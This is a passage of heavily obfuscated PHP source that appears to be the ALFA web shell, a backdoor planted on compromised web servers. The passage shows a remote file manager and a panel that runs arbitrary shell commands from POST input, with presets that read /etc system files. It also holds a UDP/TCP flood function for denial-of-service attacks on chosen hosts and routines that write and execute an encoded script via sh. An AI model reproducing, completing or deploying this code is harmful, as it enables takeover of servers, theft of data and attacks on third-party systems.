"\x3c\x64\151\x76\40\163\x74\x79\154\x65\x3d\42" . $style . "\42\76\74\x61\40\162\x6f\x77\75\x22" . $cc . "\x22\x20\151\x64\75\42\151\144\x5f" . $cc . "\x22\40\x63\154\141\x73\x73\75\x22\x6d\141\151\x6e\137\156\141\155\145\42\40\x6f\x6e\x63\154\x69\x63\x6b\x3d\x22" . ($f["\x74\x79\160\x65"] == "\x66\x69\154\x65" ? "\145\x64\x69\x74\157\162\x28\47" . $raw_name . "\47\x2c\x27\141\165\x74\x6f\47\x2c\47\x27\54\47\47\54\47\x27\54\x27" . $f["\x74\171\x70\x65"] . "\47\51\73\x22\40\x68\162\x65\x66\75\42\x23\x61\143\164\x69\x6f\x6e\x3d\x66\151\154\145\155\141\x6e\46\x70\141\x74\x68\x3d" . $GLOBALS["\143\x77\144"] . "\x26\x66\x69\154\145\x3d" . $raw_name . "\42\40\146\x6e\x61\155\145\x3d\42" . $raw_name . "\x22\40\146\164\x79\160\x65\75\42\146\151\x6c\x65\42\x20\x70\x61\164\x68\x3d\x22" . $GLOBALS["\143\167\x64"] . "\42\40\x6f\160\x74\137\164\151\164\154\145\x3d\x22" . $f["\x6c\x69\x6e\x6b"] . "\42\40" . (isset($f["\154\x69\156\153"]) ? "\157\156\x6d\157\165\x73\145\157\x76\x65\162\75\x22\163\x68\157\x77\123\171\155\x6c\x69\x6e\x6b\120\141\164\x68\x28\164\150\x69\x73\54\145\x76\145\156\164\51\73\x22\x20\x6f\x6e\x6d\157\165\163\x65\157\x75\x74\75\42\150\151\144\x65\123\171\x6d\x6c\x69\x6e\153\120\x61\x74\150\50\164\150\x69\x73\x2c\x65\166\145\156\x74\x29\x3b\42" : '') . "\x3e" . ($GLOBALS["\143\167\x64"] . $f["\156\141\x6d\x65"] == $GLOBALS["\137\137\x66\x69\x6c\145\x5f\x70\141\x74\150"] ? "\x3c\x73\x70\x61\x6e\40\x63\154\x61\x73\163\75\47\163\x68\x65\x6c\154\137\156\141\155\x65\47\x20\163\164\171\x6c\145\75\x27\146\x6f\x6e\164\55\167\145\151\147\x68\x74\x3a\x75\x6e\163\x65\x74\x3b\x27\76" . $f["\x6e\x61\155\145"] . "\x3c\57\x73\x70\x61\156\x3e" : htmlspecialchars($newname)) : "\x67\50\47\106\151\154\x65\x73\x4d\141\156\47\54\47" . $f["\x70\x61\164\x68"] . "\47\x29\x3b\42\40\x68\162\x65\146\75\42\43\141\143\x74\x69\157\x6e\75\x66\151\154\145\x6d\x61\156\x26\160\141\x74\150\x3d" . $f["\x70\x61\x74\x68"] . "\42\40\x66\156\141\155\145\x3d\42" . $raw_name . "\42\40\x66\164\171\160\145\75\x22\146\x6f\x6c\x64\145\162\42\x20\160\x61\x74\x68\x3d\42" . $GLOBALS["\x63\x77\144"] . "\42\x20\157\160\164\137\x74\x69\x74\154\x65\x3d\42" . $f["\x6c\x69\x6e\153"] . "\42\x20" . (isset($f["\154\x69\156\153"]) ? "\x6f\156\155\157\165\163\x65\x6f\166\x65\x72\x3d\x22\163\x68\157\x77\x53\171\x6d\x6c\x69\156\153\120\x61\x74\x68\50\164\150\151\163\54\145\166\145\x6e\x74\51\x3b\42\40\157\156\x6d\157\165\x73\x65\157\165\x74\x3d\42\150\151\144\145\x53\171\x6d\154\x69\x6e\153\x50\x61\x74\x68\50\x74\150\x69\163\54\x65\166\145\156\x74\51\x3b\x22" : '') . "\76\x3c\x62\76\x7c\40" . htmlspecialchars($f["\x6e\141\155\145"]) . "\40\174\x3c\57\142\76") . "\74\57\141\76\74\57\164\x64\x3e\x3c\x2f\144\151\166\x3e\x3c\x74\144\x3e\74\163\160\x61\x6e\40\163\x74\171\x6c\x65\75\x22\x66\157\156\x74\x2d\167\145\151\147\x68\x74\72\x75\156\163\145\x74\x3b\42\x20\x63\x6c\x61\163\163\x3d\x22\155\141\x69\156\137\x73\151\172\145\42\76" . ($f["\x74\171\x70\x65"] == "\x66\151\154\145" ? (isset($f["\x6c\x69\x6e\x6b"]) ? "\133\114\135\40" : '') . alfaSize($f["\x73\151\172\145"]) : $f["\x74\171\x70\x65"]) . "\74\x2f\x73\x70\x61\x6e\76\74\57\x74\x64\76\x3c\x74\144\x3e\x3c\163\160\141\x6e\x20\163\x74\x79\154\145\x3d\42\x66\x6f\x6e\x74\55\x77\x65\x69\x67\x68\x74\72\x75\x6e\163\145\164\x3b\x22\40\143\154\x61\x73\x73\75\42\x6d\141\151\x6e\137\155\157\x64\x69\x66\171\42\76" . $f["\x6d\157\144\151\146\171"] . "\74\57\163\160\141\x6e\x3e\x3c\57\x74\x64\x3e\74\164\x64\76\x3c\163\160\141\156\x20\163\x74\171\154\x65\75\x22\x66\x6f\x6e\x74\55\167\145\x69\x67\x68\164\x3a\165\156\x73\x65\164\x3b\42\x20\x63\154\x61\x73\x73\75\x22\x6d\141\151\x6e\137\x6f\x77\156\x65\162\137\x67\162\157\165\x70\42\x3e" . $f["\157\x77\156\x65\162"] . "\57" . $f["\147\162\x6f\165\x70"] . "\74\x2f\163\x70\141\156\76\x3c\x2f\x74\x64\76\74\x74\144\x3e\x3c\141\40\151\x64\75\x22\x69\144\137\x63\150\155\x6f\144\145\x5f" . $cc . "\42\x20\x68\162\145\x66\75\152\x61\x76\x61\163\x63\x72\151\160\x74\72\x76\157\151\x64\x28\x30\51\x20\157\x6e\x63\154\x69\x63\x6b\75\42\145\x64\151\x74\x6f\x72\50\47" . $raw_name . "\47\54\x27\143\150\x6d\x6f\x64\x27\54\47\47\x2c\x27\47\54\47\47\x2c\47" . $f["\164\171\x70\x65"] . "\x27\x29\42\76" . $f["\x70\x65\x72\155\163"] . "\74\x2f\164\x64\x3e\x3c\x74\x64\76\x3c\x61\x20\x69\x64\75\x22\x69\x64\x5f\162\145\156\141\x6d\x65\x5f" . $cc . "\x22\40\164\x69\164\x6c\145\75\42\122\145\x6e\x61\155\x65\x22\40\143\154\x61\163\x73\x3d\x22\141\143\x74\151\x6f\156\x73\x22\x20\150\x72\x65\146\x3d\x22\x6a\x61\166\141\163\x63\x72\x69\160\x74\x3a\166\157\x69\144\50\60\x29\73\42\x20\157\x6e\x63\154\x69\143\x6b\x3d\42\145\x64\151\164\157\x72\50\x27" . $raw_name . "\x27\x2c\x20\47\x72\145\156\141\x6d\145\x27\x2c\47\47\54\47\47\x2c\47\47\54\47" . $f["\x74\x79\160\145"] . "\47\x29\x22\x3e\x52\74\x2f\x61\76\40\74\x61\x20\x69\x64\75\42\151\144\x5f\164\x6f\165\143\150\137" . $cc . "\x22\x20\x74\x69\164\154\x65\75\x22\115\x6f\144\x69\146\171\x20\104\141\164\145\164\x69\155\145\x22\x20\x63\x6c\x61\163\163\75\42\x61\143\164\151\x6f\156\x73\42\x20\x68\x72\145\146\x3d\42\x6a\141\166\x61\x73\x63\x72\151\x70\x74\x3a\x76\157\x69\144\x28\60\51\73\42\40\x6f\156\x63\154\x69\x63\x6b\x3d\42\145\144\x69\164\x6f\162\50\47" . $raw_name . "\47\54\40\47\164\x6f\165\x63\150\47\54\47\x27\54\x27\x27\x2c\x27\47\x2c\x27" . $f["\164\171\160\x65"] . "\47\51\42\x3e\x54\74\x2f\x61\x3e" . ($f["\164\x79\160\x65"] == "\146\151\x6c\145" ? "\x20\74\x61\x20\x69\x64\x3d\x22\x69\x64\137\145\144\151\164\x5f" . $cc . "\x22\x20\x63\x6c\141\163\163\75\42\x61\x63\x74\x69\x6f\x6e\x73\x22\40\164\151\164\154\145\75\x22\105\144\x69\x74\42\x20\150\x72\x65\x66\75\42\x6a\x61\166\141\x73\x63\x72\151\160\164\x3a\166\157\x69\144\x28\60\x29\x3b\x22\x20\x6f\156\x63\x6c\151\x63\x6b\x3d\x22\145\144\151\x74\157\162\50\47" . $raw_name . "\47\54\40\47\145\x64\151\164\47\x2c\47\47\x2c\47\x27\54\x27\47\x2c\47" . $f["\x74\171\160\x65"] . "\47\x29\42\x3e\x45\x3c\x2f\x61\76\40\74\141\x20\x69\144\x3d\42\x69\144\x5f\x64\x6f\x77\x6e\x6c\x6f\141\x64\137" . $cc . "\x22\x20\x74\x69\x74\154\x65\75\42\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x22\40\143\x6c\141\163\x73\75\x22\x61\143\x74\x69\x6f\156\x73\x22\40\x68\x72\x65\146\x3d\x22\x6a\141\166\141\x73\143\162\151\x70\164\x3a\x76\x6f\151\x64\x28\x30\x29\x3b\x22\x20\157\156\143\x6c\x69\143\153\x3d\42\147\x28\47\106\x69\154\x65\163\124\157\x6f\x6c\163\47\54\156\x75\x6c\x6c\x2c\47" . $raw_name . "\47\54\x20\47\x64\x6f\167\x6e\154\157\x61\x64\x27\x29\42\x3e\104\74\57\141\76" : '') . "\x3c\141\40\151\x64\75\x22\x69\144\x5f\x64\x65\154\x65\164\x65\x5f" . $cc . "\x22\40\x74\x69\x74\x6c\x65\75\x22\104\x65\x6c\145\x74\145\42\40\143\x6c\141\163\x73\75\x22\141\x63\164\x69\x6f\156\163\42\x20\x68\x72\145\x66\x3d\42\152\141\166\x61\163\143\162\151\160\x74\72\x76\157\x69\x64\x28\x30\x29\x3b\42\40\157\156\x63\154\x69\x63\153\75\x22\x76\141\x72\x20\143\150\153\40\x3d\40\143\x6f\x6e\x66\x69\x72\155\50\47\101\x72\x65\40\131\157\x75\x20\123\165\162\x65\x20\x46\x6f\162\40\104\x65\x6c\x65\164\145\40\x23\x20" . addslashes(rawurldecode($f["\x6e\x61\x6d\x65"])) . "\40\x23\40\77\x27\51\73\40\x63\150\153\40\77\40\147\50\47\x46\151\154\x65\x73\115\x61\156\47\54\156\x75\x6c\x6c\x2c\47\x64\145\x6c\145\164\x65\x27\54\x20\x27" . $raw_name . "\x27\x29\40\72\x20\x27\47\x3b\x22\x3e\40\130\40\x3c\x2f\x61\x3e\74\x2f\164\x64\x3e\x3c\x2f\x74\x72\x3e"; $l = $l ? 0 : 1; $cc++; } echo "\x3c\164\x72\x20\x69\144\75\x27\x66\x69\154\145\155\141\x6e\x61\147\145\x72\x5f\154\141\x73\164\137\164\162\x27\x3e\74\x74\144\x20\143\x6f\154\163\160\x61\156\x3d\67\76\12\x3c\x69\x6e\160\x75\164\40\x74\171\x70\145\x3d\150\151\144\144\145\156\x20\156\141\x6d\145\x3d\x61\40\x76\141\154\165\145\x3d\47\x46\151\154\145\163\x4d\141\x6e\47\x3e\xa\x3c\151\156\x70\165\x74\40\164\x79\x70\x65\x3d\x68\151\x64\x64\x65\x6e\40\156\141\x6d\x65\x3d\143\40\166\x61\x6c\165\145\75\47" . htmlspecialchars($GLOBALS["\147\154\157\x62\x5f\143\x68\144\151\162\137\x66\141\x6c\x73\x65"] ? $_POST["\x63"] : $GLOBALS["\143\x77\144"]) . "\x27\x3e\xa\x3c\151\156\x70\x75\164\40\x74\171\160\145\75\150\151\144\x64\145\156\x20\156\141\155\145\75\143\x68\x61\x72\x73\145\164\x20\x76\141\x6c\x75\x65\75\47" . (isset($_POST["\143\x68\141\162\x73\x65\x74"]) ? $_POST["\143\150\x61\x72\x73\145\164"] : '') . "\47\76\12\74\163\x65\x6c\x65\143\x74\40\x69\x64\x3d\47\164\157\157\154\x73\137\163\145\154\x65\x63\164\157\162\47\40\156\141\155\x65\75\x27\x61\154\146\141\x31\x27\x3e\74\157\160\x74\151\157\x6e\40\x76\141\x6c\x75\x65\x3d\x27\143\157\x70\x79\47\76\x43\157\160\x79\74\57\x6f\x70\164\x69\x6f\x6e\x3e\74\x6f\160\x74\151\x6f\x6e\x20\166\141\154\165\x65\x3d\47\x6d\157\166\145\x27\x3e\x4d\157\x76\x65\74\x2f\157\x70\164\x69\x6f\x6e\x3e\x3c\157\x70\x74\151\x6f\x6e\40\166\141\154\165\145\x3d\x27\x64\x65\154\x65\x74\x65\x27\40\163\x65\x6c\145\x63\164\145\144\76\104\x65\x6c\x65\x74\145\x3c\x2f\x6f\x70\164\151\157\x6e\x3e\74\x6f\160\164\x69\x6f\156\40\x76\141\154\x75\145\x3d\47\x7a\x69\160\x27\76\101\144\144\x20\62\x20\103\x6f\x6d\160\162\145\x73\x73\x20\50\x7a\x69\160\51\74\57\157\160\x74\x69\x6f\156\76\x3c\x6f\160\164\x69\157\156\40\x76\141\154\x75\145\75\x27\165\156\x7a\151\x70\47\76\101\x64\x64\x20\x32\x20\x55\x6e\x63\x6f\155\160\x72\145\x73\163\x20\50\x7a\x69\160\x29\x3c\57\x6f\x70\x74\151\x6f\156\76\74\157\x70\x74\151\157\156\40\x76\141\154\x75\x65\x3d\47\160\141\x73\164\145\47\x3e\120\x61\x73\164\145\40\57\40\x5a\x69\x70\40\x2f\x20\x55\156\172\x69\x70\40\x3c\x2f\x6f\160\x74\151\x6f\x6e\76\74\x2f\x73\x65\x6c\145\x63\x74\76\xa\74\x69\x6e\160\x75\164\40\x74\x79\160\x65\75\47\x73\165\142\155\151\x74\x27\40\x76\141\x6c\165\145\75\47\40\47\76\xa\74\57\146\157\162\155\x3e\x3c\x2f\x74\141\x62\x6c\x65\x3e\x3c\x64\x69\x76\x20\x63\154\x61\163\163\75\47\160\x61\147\x65\163\x2d\x68\x6f\154\144\x65\162\x27\76\x3c\144\x69\x76\x20\143\x6c\141\163\163\x3d\47\160\141\147\x65\163\x2d\x6e\x75\x6d\x62\x65\x72\x27\x3e" . $page_builder . "\x3c\57\x64\151\166\76\74\57\x64\151\x76\76\x3c\57\144\x69\166\76\74\57\x64\151\166\x3e"; alfafooter(); } goto TdVrb; tvxAH: function alfados() { alfahead(); echo "\x3c\x64\151\x76\40\143\154\141\x73\x73\x3d\150\145\x61\x64\145\162\x3e"; echo "\74\x63\145\156\x74\x65\162\x3e\74\x70\76\x3c\x64\151\x76\40\143\x6c\141\163\x73\75\x22\164\170\x74\146\157\x6e\x74\137\x68\145\x61\x64\x65\162\x22\76\174\x20\104\x4f\x53\x20\174\x3c\x2f\144\x69\x76\76\x3c\x2f\160\76\x3c\x66\157\162\x6d\40\157\x6e\123\165\142\155\x69\x74\75\x22\x67\50\x27\x64\x6f\163\x27\54\x6e\x75\x6c\x6c\54\x74\150\151\163\56\x68\157\163\164\x2e\166\141\x6c\x75\x65\x2c\x74\150\151\x73\56\164\151\155\145\x2e\166\x61\154\x75\145\54\x74\x68\151\x73\x2e\160\157\x72\x74\56\166\x61\x6c\x75\145\x2c\x74\x68\151\x73\x2e\x6d\x2e\166\x61\154\165\145\51\x3b\40\x72\145\164\x75\x72\156\x20\146\x61\x6c\163\x65\x3b\x22\x3e\74\x64\151\166\40\x63\154\x61\x73\163\x3d\x22\x74\170\x74\146\x6f\156\164\42\x3e\x4d\145\x74\150\x6f\x64\x20\72\x20\x3c\163\x65\154\x65\x63\164\40\156\x61\x6d\x65\x3d\42\x6d\42\x20\163\164\171\x6c\x65\x3d\42\167\x69\x64\x74\x68\72\70\x30\160\170\73\x22\x3e\74\x6f\x70\x74\x69\x6f\156\40\166\x61\154\165\145\x3d\42\x75\144\160\x22\x3e\125\x44\120\x3c\x2f\157\160\x74\x69\x6f\x6e\x3e\74\x6f\x70\164\x69\157\x6e\x20\166\x61\154\x75\x65\75\42\x74\143\160\42\x3e\124\103\x50\x3c\x2f\x6f\x70\164\x69\157\156\x3e\74\57\x73\145\154\145\143\164\x3e\40\x48\x6f\x73\164\40\x3a\x20\74\151\156\x70\x75\164\40\x6e\141\x6d\x65\75\x22\150\x6f\x73\x74\42\x20\x74\171\x70\x65\x3d\x22\x74\145\x78\x74\x22\x20\166\x61\154\165\x65\x3d\42\154\x6f\x63\141\154\x68\157\163\164\42\x20\163\x69\172\145\x3d\42\x32\x35\x22\40\x2f\76\40\x54\151\155\145\40\72\x20\74\151\156\x70\165\164\40\156\141\x6d\x65\75\x22\164\x69\155\x65\42\x20\x74\x79\x70\145\75\x22\164\x65\x78\164\42\x20\x73\151\x7a\145\x3d\x22\61\x35\x22\x20\x2f\76\x20\120\x6f\162\x74\40\72\x20\x3c\x69\156\160\165\164\40\156\141\155\145\x3d\42\160\157\x72\x74\x22\40\164\171\160\145\x3d\42\x74\x65\x78\x74\x22\40\x73\x69\x7a\x65\75\42\x31\60\x22\x20\x2f\x3e\40\x3c\151\156\160\165\x74\x20\164\x79\160\145\x3d\42\163\165\x62\155\x69\x74\x22\x20\166\141\154\x75\x65\75\x22\40\42\40\x2f\x3e\x3c\x2f\144\x69\166\76\74\57\146\157\x72\155\x3e\x3c\57\x63\x65\x6e\164\145\x72\76\x3c\142\162\76"; if (!empty($_POST["\141\x6c\146\141\x31"]) && !empty($_POST["\x61\154\146\x61\62"]) && !empty($_POST["\x61\154\x66\141\63"])) { echo __pre(); $packets = 0; ignore_user_abort(true); $exec_time = (int) $_POST["\141\154\146\x61\x32"]; $time = time(); $max_time = $exec_time + $time; $host = $_POST["\x61\x6c\146\x61\x31"]; $port = (int) $_POST["\x61\x6c\x66\141\x33"]; $method = $_POST["\141\x6c\146\141\64"]; $out = str_repeat("\130", 65000); while (1) { $packets++; if (time() > $max_time) { break; } $fp = @fsockopen($method . "\72\57\x2f" . $host, $port, $errno, $errstr, 5); if ($fp) { fwrite($fp, $out); fclose($fp); } } echo "\x3c\x63\145\x6e\164\x65\x72\76{$packets}\x20\x28" . @round($packets * 65 / 1024, 2) . "\x20\115\102\51\40\x70\x61\143\x6b\145\x74\x73\x20\141\166\145\162\x61\147\151\x6e\x67\x20" . @round($packets / $exec_time, 2) . "\40\x70\x61\x63\153\x65\x74\163\x20\160\145\x72\40\x73\145\143\x6f\156\x64\x3c\57\x63\x65\x6e\164\x65\x72\76"; echo "\74\x2f\x70\x72\145\x3e"; } echo "\x3c\57\144\151\166\76"; alfafooter(); } goto XTnlF; H2ZQs: function alfaproc() { alfahead(); echo "\74\x44\x69\166\x20\x63\154\x61\163\x73\75\150\x65\x61\x64\x65\162\76\x3c\142\x72\76\74\143\x65\x6e\164\x65\x72\x3e"; if (empty($_POST["\141\x6a\x61\x78"]) && !empty($_POST["\141\154\146\x61\x31"])) { $_COOKIE[md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\123\124"]) . "\x61\152\x61\170"] = false; } if ($GLOBALS["\163\171\163"] == "\167\x69\156") { $process = array("\124\141\x73\153\x20\114\x69\x73\164" => "\x74\x61\163\153\154\x69\x73\164\40\x2f\x56", "\123\x79\x73\x74\145\x6d\40\x49\x6e\146\x6f" => "\163\171\163\x74\145\155\151\x6e\146\157", "\x41\x63\x74\x69\166\x65\40\103\157\156\x6e\x65\x63\164\x69\157\156\x73" => "\156\x65\164\163\164\x61\x74\x20\x2d\141\x6e", "\x52\x75\156\156\151\x6e\x67\40\123\145\162\x76\x69\143\x65\x73" => "\156\145\164\40\x73\164\x61\162\x74", "\x55\x73\145\x72\40\101\x63\143\157\165\x6e\164\x73" => "\156\x65\x74\40\165\x73\145\162", "\x53\150\157\x77\40\103\x6f\155\160\x75\164\x65\162\x73" => "\156\x65\164\x20\166\151\145\x77", "\101\122\x50\x20\124\141\142\x6c\145" => "\x61\x72\x70\x20\x2d\x61", "\111\120\40\103\157\156\146\151\147\165\162\141\x74\x69\157\x6e" => "\151\160\x63\x6f\156\x66\x69\147\x20\57\141\154\x6c"); } else { $process = array("\120\162\157\x63\x65\163\163\x20\x73\x74\x61\x74\165\x73" => "\x70\x73\x20\x61\x75\170", "\x53\x79\x73\x6c\x6f\147" => "\x63\x61\164\40\57\145\x74\x63\x2f\x73\x79\163\x6c\157\147\56\x63\x6f\156\146", "\122\145\163\x6f\154\x76" => "\143\141\164\40\x2f\145\164\x63\57\x72\145\163\157\x6c\166\56\143\157\156\146", "\110\157\163\x74\163" => "\x63\x61\164\x20\57\145\164\143\x2f\x68\157\163\x74\163", "\x43\160\x75\151\x6e\146\157" => "\143\141\164\x20\57\160\x72\x6f\x63\x2f\143\x70\165\x69\x6e\146\x6f", "\x56\x65\162\x73\151\157\x6e" => "\143\x61\164\x20\57\x70\162\x6f\143\x2f\x76\145\x72\x73\x69\157\156", "\x53\x62\151\156" => "\154\x73\x20\55\x61\154\x20\x2f\165\163\x72\57\x73\142\x69\156", "\x49\x6e\x74\145\x72\x72\165\160\x74\163" => "\x63\141\164\40\x2f\160\162\157\x63\x2f\x69\156\164\x65\x72\162\x75\160\164\163", "\154\163\141\x74\164\162" => "\154\x73\141\x74\x74\162\40\x2d\x76\141", "\125\x70\x74\x69\x6d\x65" => "\165\x70\x74\x69\x6d\145", "\106\x73\164\x61\x62" => "\x63\141\164\40\57\x65\164\143\x2f\146\163\164\141\142"); } foreach ($process as $n => $link) { echo "\x3c\141\40\150\x72\145\x66\x3d\x22\152\141\x76\141\163\143\x72\x69\160\x74\x3a\x76\x6f\x69\x64\x28\x30\51\73\x22\x20\x6f\x6e\x63\x6c\x69\x63\153\75\42\x67\50\47\160\x72\x6f\143\x27\x2c\156\165\x6c\x6c\x2c\x27" . $link . "\47\x29\x22\76\40\x7c\40" . $n . "\x20\174\x20\74\57\x61\x3e"; } echo "\74\57\143\x65\x6e\164\x65\x72\x3e\x3c\x62\162\76"; if (!empty($_POST["\141\154\146\x61\61"])) { echo "\74\x70\162\145\x20\143\154\141\163\163\x3d\47\155\154\x31\47\x20\163\164\x79\x6c\x65\x3d\47\x6d\141\162\x67\151\156\x2d\x74\157\160\72\65\x70\170\47\x20\x3e"; if ($GLOBALS["\x67\154\157\142\x5f\x63\x68\x64\151\x72\137\146\x61\x6c\163\x65"] && !empty($_POST["\x63"])) { $cmd = "\x63\144\x20\x27" . addslashes($_POST["\143"]) . "\47\x3b"; } echo alfaEx($cmd . $_POST["\x61\x6c\146\x61\x31"], true); echo "\x3c\x2f\160\x72\145\x3e"; } echo "\74\x2f\x64\151\x76\x3e"; alfafooter(); } goto ar_2Q; AkVgx: function _alfa_file_exists($file, $cgi = true) { if (@file_exists($file)) { return true; } else { if (strlen(alfaEx("\x6c\x73\40\x2d\x6c\141\40\47" . addslashes($file) . "\47", false, $cgi)) > 0) { return true; } } return false; } goto q3RIR; nWc3X: function alfaupdateheader() { if (!isset($_COOKIE["\x75\x70\144\x61\164\x65\150\145\x61\144\145\162\137\x64\x61\164\x61"])) { $bash = "\x7a\x5a\x52\144\x62\x39\x6f\x77\106\x49\x61\x76\x79\141\70\x34\x39\144\111\x47\x4a\114\x4b\60\166\x56\171\x46\x4e\x46\x54\157\x68\x45\x52\x42\x67\x74\x46\x64\121\111\x52\115\x34\x68\101\114\x34\x30\x52\62\125\153\x59\160\57\x33\61\62\147\x50\101\122\161\114\x71\x62\141\x59\156\x79\x49\146\163\70\x78\x2b\70\x35\162\53\x55\x76\x56\x30\x34\161\150\124\117\x68\x33\x4a\x47\150\x4d\145\147\63\x6e\x77\142\x74\127\156\156\161\145\143\x44\x55\157\172\x38\x2b\172\x50\107\x4d\121\102\x7a\x47\105\x42\x50\102\x49\106\x34\155\x59\143\x52\x42\x70\112\115\x6c\112\x46\x6a\x41\x39\111\x33\x47\115\116\x6d\53\115\101\x76\167\120\x58\103\x46\122\x52\x35\117\103\x4d\151\125\53\x70\161\x71\x47\x49\x33\165\162\x30\66\67\x57\x32\70\60\x65\57\x31\x61\145\124\x45\154\103\121\121\153\70\x55\112\147\123\x2f\64\142\x47\x4f\125\172\x43\x56\66\161\60\165\163\x5a\164\x6f\x6a\x74\x4f\x52\x55\x69\x45\x68\x57\104\145\x47\x45\105\116\x67\x46\x72\x68\126\x4a\x4a\x67\x70\123\x68\142\x38\x4f\x52\132\170\154\x42\112\x49\x41\x43\x35\127\103\x75\x4e\x71\161\x48\63\71\x33\61\101\x2f\151\122\x41\x65\160\141\x68\116\x51\114\141\x32\131\65\x2b\64\x4a\112\x4b\x30\132\160\117\111\x51\x72\x73\116\70\101\155\x64\153\x67\101\164\145\x46\x6d\x78\x76\131\65\122\70\x68\x6b\64\x35\x51\61\126\113\65\161\64\x59\x66\143\x5a\113\166\152\x45\142\x71\x64\161\x73\x6a\104\x2b\x33\106\111\104\71\x61\x63\102\132\x68\x6e\x34\x69\151\156\157\116\x53\x2f\66\x32\x6f\154\x4f\115\x35\x55\x58\x71\x51\132\132\141\x7a\146\67\x41\170\x76\x4b\x75\53\112\x6d\x42\x37\144\x2f\x62\144\57\x57\63\x46\171\x69\104\x72\x45\112\112\x45\x55\x48\71\x4c\171\121\x54\162\127\x45\x44\x58\113\x51\x7a\x68\x65\x67\101\x75\125\x74\160\165\60\122\154\165\113\161\111\60\x50\x67\x4e\x4f\116\146\x6a\152\101\x39\103\x50\65\x70\150\x79\161\x55\x45\71\70\144\114\161\x2f\122\x7a\x55\x32\x2b\116\107\x39\67\156\x65\66\166\122\162\x79\106\x48\x37\x77\x6e\155\154\x49\x6b\153\170\x63\x7a\x62\102\x71\x74\x6c\x45\x53\x47\x52\x30\x36\x73\57\116\170\x76\x69\x78\62\x33\156\x61\x68\x75\x6b\x69\x2f\141\x39\145\x78\x41\x4e\x6b\x76\116\x54\142\x72\130\161\57\x6d\127\146\101\x6a\x47\x4a\112\160\113\x4e\x6e\145\x75\115\115\126\x56\x4f\x76\127\x47\167\157\116\125\x34\104\125\101\x62\157\x62\160\x6f\x6e\x4b\162\x51\122\104\x35\103\105\x68\102\x75\154\x62\132\124\x34\117\x4b\161\60\x4b\71\101\163\64\x38\x55\x4d\x72\x47\141\156\163\x59\x6f\x46\65\121\154\60\x65\155\163\114\x54\164\105\x4b\x37\120\161\x67\114\x59\x51\x53\x59\x66\164\x6c\x6a\150\160\x77\131\121\60\x6d\103\63\110\x76\163\x50\104\x41\x5a\163\x65\x5a\152\x78\x4b\142\53\57\x37\71\152\146\x51\x39\126\x63\x67\x74\171\121\107\x4f\x48\x72\x46\151\x65\x67\x54\67\141\x67\x75\143\62\x41\x4e\x75\122\x67\124\125\x79\101\127\x52\147\x69\x43\x39\x39\x58\116\104\164\155\64\x57\170\67\x64\x65\130\x72\x4c\x6f\147\x4c\x76\x51\x74\64\x4f\131\163\x7a\60\x37\144\x75\x50\x38\x69\x73\127\125\145\144\102\57\x37\163\x4f\x6e\x58\x62\x67\163\x39\113\124\x32\x77\x36\103\x7a\170\x57\57\x30\x66\130\66\x62\141\x48\x33\65\x63\x65\107\x75\x31\123\156\170\102\167\x3d\75"; $realdir = addslashes(dirname($_SERVER["\123\103\122\111\120\x54\137\x46\111\114\x45\116\x41\x4d\105"])); $tmp_path = alfaWriteTocgiapi("\147\145\164\150\145\141\x64\145\x72\x2e\141\x6c\x66\141", $bash); $data = alfaEx("\143\144\40\47{$tmp_path}\x2f\x61\x6c\x66\x61\x63\x67\151\x61\160\x69\x27\x3b\x73\x68\x20\147\145\164\x68\x65\x61\144\145\162\x2e\141\x6c\x66\x61", false, true, true); if (@is_array(@json_decode($data, true))) { __alfa_set_cookie("\x75\160\x64\141\x74\x65\x68\145\141\144\145\162\x5f\144\141\x74\x61", __ZW5jb2Rlcg($data)); echo $data; } } else { echo __ZGVjb2Rlcg($_COOKIE["\165\160\144\x61\x74\x65\150\x65\141\144\x65\162\137\x64\141\164\x61"]); } } goto xSGgd; NKFok: function alfaCreateParentFolder() { $parent = $GLOBALS["\150\157\155\145\x5f\x63\x77\144"] . "\57" . __ALFA_DATA_FOLDER__; if (!@is_dir($parent)) { @mkdir($parent, 493, true); } } goto LikDE; D73tS: class AlfaCURL { public $headers; public $user_agent; public $compression; public $cookie_file; public $proxy; public $path; public $ssl = true; public $curl_status = true; function __construct($cookies = false, $compression = "\147\172\151\160", $proxy = '') { if (!extension_loaded("\143\x75\x72\x6c")) { $curl_status = false; return false; } $this->headers[] = "\x41\143\143\145\160\x74\72\40\151\x6d\x61\x67\145\x2f\147\x69\146\x2c\40\151\x6d\x61\147\x65\x2f\x78\55\142\151\x74\155\141\160\x2c\40\151\155\x61\147\145\x2f\152\160\x65\147\x2c\x20\x69\155\141\x67\145\57\x70\x6a\160\x65\147"; $this->headers[] = "\x43\x6f\x6e\156\x65\143\164\x69\157\x6e\72\40\113\145\145\160\x2d\x41\154\x69\166\145"; $this->headers[] = "\x43\157\x6e\x74\145\156\x74\55\x74\x79\160\x65\72\x20\x61\x70\160\154\151\x63\x61\x74\x69\x6f\x6e\57\x78\x2d\167\x77\x77\x2d\x66\157\162\x6d\x2d\165\162\x6c\x65\156\143\157\x64\145\x64\73\x63\150\141\162\x73\x65\164\x3d\x55\x54\106\55\70"; $this->user_agent = "\115\x6f\x7a\151\x6c\x6c\141\x2f\65\56\60\x20\50\115\x61\143\151\156\x74\157\x73\x68\73\40\111\156\x74\x65\x6c\x20\x4d\x61\x63\40\117\x53\x20\x58\40\x31\x30\137\x31\x34\137\66\x29\40\x41\160\160\x6c\145\127\x65\142\x4b\x69\x74\57\x35\63\x37\56\x33\66\40\x28\113\110\124\115\x4c\54\x20\154\x69\153\x65\40\107\145\x63\153\157\51\x20\x43\x68\162\157\x6d\x65\x2f\70\x33\x2e\60\x2e\x34\61\60\x33\56\x36\61\x20\x53\141\146\141\162\x69\x2f\65\63\67\56\63\66\51"; $this->path = ALFA_TEMPDIR . "\57\101\154\146\141\137\x63\x6f\157\153\x69\x65\163\x2e\x74\170\x74"; $this->compression = $compression; $this->proxy = $proxy; $this->cookies = $cookies; if ($this->cookies) { $this->cookie($this->path); } } function cookie($cookie_file) { if (_alfa_file_exists($cookie_file, false)) { $this->cookie_file = $cookie_file; } else { @fopen($cookie_file, "\167") or die($this->error("\x54\150\145\40\x63\x6f\x6f\153\151\x65\40\146\151\x6c\145\40\143\x6f\x75\x6c\144\40\156\157\164\40\142\x65\x20\157\x70\145\156\x65\x64\x2e")); $this->cookie_file = $cookie_file; @fclose($this->cookie_file); } } function Send($url, $method = "\x67\145\164", $data = '') { if (!$this->curl_status) { return false; } $process = curl_init($url); curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); 